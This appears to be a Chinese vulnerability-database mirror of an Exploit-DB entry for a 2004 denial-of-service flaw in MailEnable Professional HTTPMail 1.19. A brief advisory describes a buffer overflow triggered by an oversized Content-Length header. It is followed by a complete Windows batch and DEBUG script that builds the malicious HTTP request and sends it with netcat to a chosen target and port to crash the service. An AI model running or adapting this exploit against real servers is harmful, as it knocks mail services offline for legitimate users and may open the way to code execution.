MailEnable 1.1x – Content-Length Denial of Service

MailEnable 1.1x – Content-Length Denial of Service

漏洞ID 1054543 漏洞类型
发布时间 2004-07-30 更新时间 2004-07-30
图片[1]-MailEnable 1.1x – Content-Length Denial of Service-安全小百科CVE编号 N/A
图片[2]-MailEnable 1.1x – Content-Length Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24343
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10838/info

MailEnable is reported prone to a remote denial of service vulnerability. This vulnerability is reported to exist in the MailEnable HTTP header parsing code.

When reading a large content-length header field from an HTTP request, the operation overflows a fixed size memory buffer and the HTTP service will reportedly crash.

The vulnerability can be exploited to crash the affected HTTP service, denying service to legitimate users. The possibility to execute arbitrary code may also be present.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:   MailEnable Professional HTTPMail
:Vendors:       http://www.mailenable.com/
:Version:       1.19
:Platforms:     Windows
:Bug:           D.O.S
:Date:          2004-07-30
:Author:        CoolICE
:E_mail:        CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

相关推荐: id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 – Command Execution

id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 – Command Execution 漏洞ID 1053369 漏洞类型 发布时间 1998-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享